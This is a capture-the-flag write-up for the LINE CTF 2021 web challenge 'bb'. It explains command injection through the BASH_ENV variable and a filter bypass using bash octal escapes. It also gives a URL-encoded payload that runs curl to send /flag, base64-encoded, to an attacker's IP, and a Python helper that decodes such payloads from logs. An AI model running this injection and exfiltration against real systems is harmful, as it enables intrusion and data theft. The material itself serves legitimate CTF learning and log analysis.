
@mdsnins
Last active Mar 27, 2022
[LINE CTF 2021] bb


LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN

BASH_ENV environment variable

We can inject a bash command line through the BASH_ENV environment variable.

`BASH_ENV=touch /tmp /bin/bash` will execute `touch`.

Non-alphabet command

This is like the 34C3 CTF challenge: we can call `cat` as `$'\143\141\164'` (octal escapes inside bash's `$'...'` quoting).

Thus, the final payload is

`$%27\143\165\162\154%27%20111.111.111.111:40010/$($%27\143\141\164%27%20$%27\57\146\154\141\147%27%20|%20$%27\142\141\163\145\66\64%27)`

Replace 111.111.111.111 with the attacker's IP.
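When a request like this shows up in an access log, an analyst first has to undo the URL encoding and then the `$'...'` octal escapes to see the real command. The following Python helper is added here and is not part of the original writeup; it assumes the payload is logged as the URL-encoded string quoted above (embedded below as a constructed sample) and decodes the octal (`\nnn`) and hex (`\xHH`) escapes bash would expand.

```python
import re
from urllib.parse import unquote

# Constructed sample: the URL-encoded payload from the writeup, as it would
# appear in a web-server access log (assumption about the logging format).
SAMPLE_PAYLOAD = (
    "$%27\\143\\165\\162\\154%27%20111.111.111.111:40010/"
    "$($%27\\143\\141\\164%27%20$%27\\57\\146\\154\\141\\147%27%20|%20"
    "$%27\\142\\141\\163\\145\\66\\64%27)"
)

# One ANSI-C quoted word: $'...' (backslash escapes allowed inside)
ANSI_C_QUOTE = re.compile(r"\$'((?:\\.|[^'\\])*)'")
# The escape forms used for this trick: \nnn (octal, 1-3 digits) and \xHH (hex)
OCTAL_OR_HEX = re.compile(r"\\([0-7]{1,3})|\\x([0-9a-fA-F]{1,2})")


def decode_ansi_c_word(body: str) -> str:
    """Turn the inside of a $'...' word into the characters bash would produce."""
    def sub(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8))   # octal escape
        return chr(int(m.group(2), 16))      # hex escape
    return OCTAL_OR_HEX.sub(sub, body)


def deobfuscate(payload: str) -> str:
    """URL-decode the request, then replace every $'...' word with its decoded text."""
    raw = unquote(payload)
    return ANSI_C_QUOTE.sub(lambda m: decode_ansi_c_word(m.group(1)), raw)


def contains_ansi_c_quoting(payload: str) -> bool:
    """Cheap log-screening check: does the request carry any $'...' words at all?"""
    return ANSI_C_QUOTE.search(unquote(payload)) is not None


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_PAYLOAD))
    # prints: curl 111.111.111.111:40010/$(cat /flag | base64)
```

`contains_ansi_c_quoting` is a coarse screen only; `$'...'` has legitimate uses, so treat a hit as a reason to run `deobfuscate` and read the result, not as proof of an attack.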

LINECTF{well..what_do_you_think_about}
